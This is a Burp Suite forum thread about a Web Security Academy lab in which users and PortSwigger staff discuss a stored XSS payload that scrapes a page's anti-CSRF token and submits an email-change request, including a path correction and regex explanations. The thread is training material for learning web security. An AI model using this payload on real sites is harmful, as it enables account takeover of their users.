Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Web Secuirty Academy- Exploiting XSS to perform CSRF

Pelumi | Last updated: Jun 06, 2019 10:02PM UTC

I am having trouble determing where to put the token within the payload given in the solution: <script> var req = new XMLHttpRequest(); req.onload = handleResponse; req.open('get','/email',true); req.send(); function handleResponse() { var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1]; var changeReq = new XMLHttpRequest(); changeReq.open('post', '/email', true); changeReq.send('csrf='+token+'&email=test@test.com') }; </script> Is it supposed to be replace (\w+)?

PortSwigger Agent | Last updated: Jun 07, 2019 01:58PM UTC

That code will automatically fetch the anti-CSRF token and include it in the second request. Try submitting it as a blog comment. If that doesn't work, drop us a line.

Burp User | Last updated: Jun 11, 2019 12:57AM UTC

I've tried multiple times to submit the code as a blog comment but I keep getting the 'Thank you for your comment' page with the lab unsolved.

Burp User | Last updated: Jun 11, 2019 01:53AM UTC

I copied the code and inserted into a blog comment verbatim.

PortSwigger Agent | Last updated: Jun 11, 2019 09:32AM UTC

We've just spotted there is a typo in the solution the line: bc. changeReq.open('post', '/email', true); should be: bc. changeReq.open('post', '/email/change', true); We will get this fixed in the coming days, but for now you can manually do this.

Burp User | Last updated: Jun 11, 2019 02:19PM UTC

Thanks much.

Methoros | Last updated: Apr 28, 2020 11:17AM UTC

Wanted to ask as I havent been able to find the answer. In this portion of the code below, var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1]; What is the [1] for? Is it to search for the number 1 of an array value 1? Javascript is 0 based so what is the [1] for?

Hannah, PortSwigger Agent | Last updated: Apr 30, 2020 11:20AM UTC

Hi In this function, we are using regex matching. With regex, you provide a pattern in between slashes, like /foo/ and then match against a string like "foo bar". A match object is returned, so if the match object variable name is "m": m[0] == "foo" If you use a pattern like /foo (bar)/ against "foo bar", the parentheses provide a "submatch". /foo (bar)/ against "foo bar": m[0] == "foo bar" m[1] == "bar" /(foo) (bar)/ against "foo bar": m[0] == "foo bar" m[1] == "foo" m[2] == "bar" Therefore, we use the [1] to retrieve the value of the csrf token that is contained within the parentheses, rather than the whole string.

Aakash | Last updated: Apr 22, 2021 10:03AM UTC

var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1]; Can anyone explain step by step what exactly is the regex doing? Why this particular sequence of slashes (backward and then forward), the +sign, the w

Hannah, PortSwigger Agent | Last updated: Apr 22, 2021 10:28AM UTC

The two forward slashes in the "match" function denote the start and end of the regular expression.

For a step-by-step breakdown of a regular expression, I would recommend pasting the expression (/name="csrf" value="(\w+)"/) into an online tool, like RegExr - it's really handy for breaking down the different components to help you understand what's going on!

Muhammed | Last updated: Jul 08, 2021 07:14PM UTC

i wonder how is it sending the request with csrf token and we didn't use the var token after assigning it ?

Hannah, PortSwigger Agent | Last updated: Jul 12, 2021 08:50AM UTC

If you look at the solution, you can see that the token variable is used in the last line of script: changeReq.send('csrf='+token+'&email=test@test.com')

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.